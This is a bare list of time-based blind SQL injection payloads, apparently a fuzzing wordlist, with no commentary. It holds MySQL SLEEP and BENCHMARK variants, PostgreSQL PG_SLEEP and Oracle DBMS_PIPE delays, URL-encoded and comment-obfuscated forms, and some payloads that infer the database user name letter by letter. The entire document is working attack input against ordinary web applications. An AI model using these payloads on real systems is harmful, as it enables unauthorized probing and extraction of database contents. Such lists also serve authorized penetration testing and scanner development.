0'|(IF((now())LIKE(sysdate()),SLEEP(10),0))|'Z
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10*1),0))XOR'Z
1'%2b(select*from(select(sleep(10)))a)%2b'
1 AND (SELECT(0)FROM(SELECT(SLEEP(10)))a)-- wXyW
1' AND (SELECT 6268 FROM (SELECT(SLEEP(10)))ghXo) AND 'IKlK'='IKlK
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(10))A))
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(10)))IiOE)
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(10),1)))a)--%20 - true
'%2bbenchmark(10000000,sha1(1))%2b'
'%2b(select*from(select(sleep(10)))a)%2b'
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
BENCHMARK(10000000,MD5(CHAR(116)))
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(10))END
DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
desc%2c(select*from(select(sleep(10)))a)
if(now()=sysdate(),sleep(10),0)
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"/
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
(SELECT(0)FROM(SELECT(SLEEP(10)))a)
(select(0)from(select(sleep(10)))v)
');(SELECT 4564 FROM PG_SLEEP(10))--
'+(select*from(select(if(1=1,sleep(10),false)))a)+'
(select*from(select(sleep(10)))a)
,(select * from (select(sleep(10)))a)
(SELECT * FROM (SELECT(SLEEP(10)))a)
*'XOR(if(2=2,sleep(10),0))OR'
'XOR(if(now()=sysdate(),sleep(10),0))OR'
'XOR(if(now()=sysdate(),sleep(10),0))XOR'
"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(10*1),0))OR'
'XOR(SELECT(0)FROM(SELECT(SLEEP(10)))a)XOR'Z
X'XOR(if(now()=sysdate(),(sleep(10)),0))XOR'X
X'XOR(if(now()=sysdate(),//sleep(10)//,0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(10000000,md5('xyz')),0))XOR'X
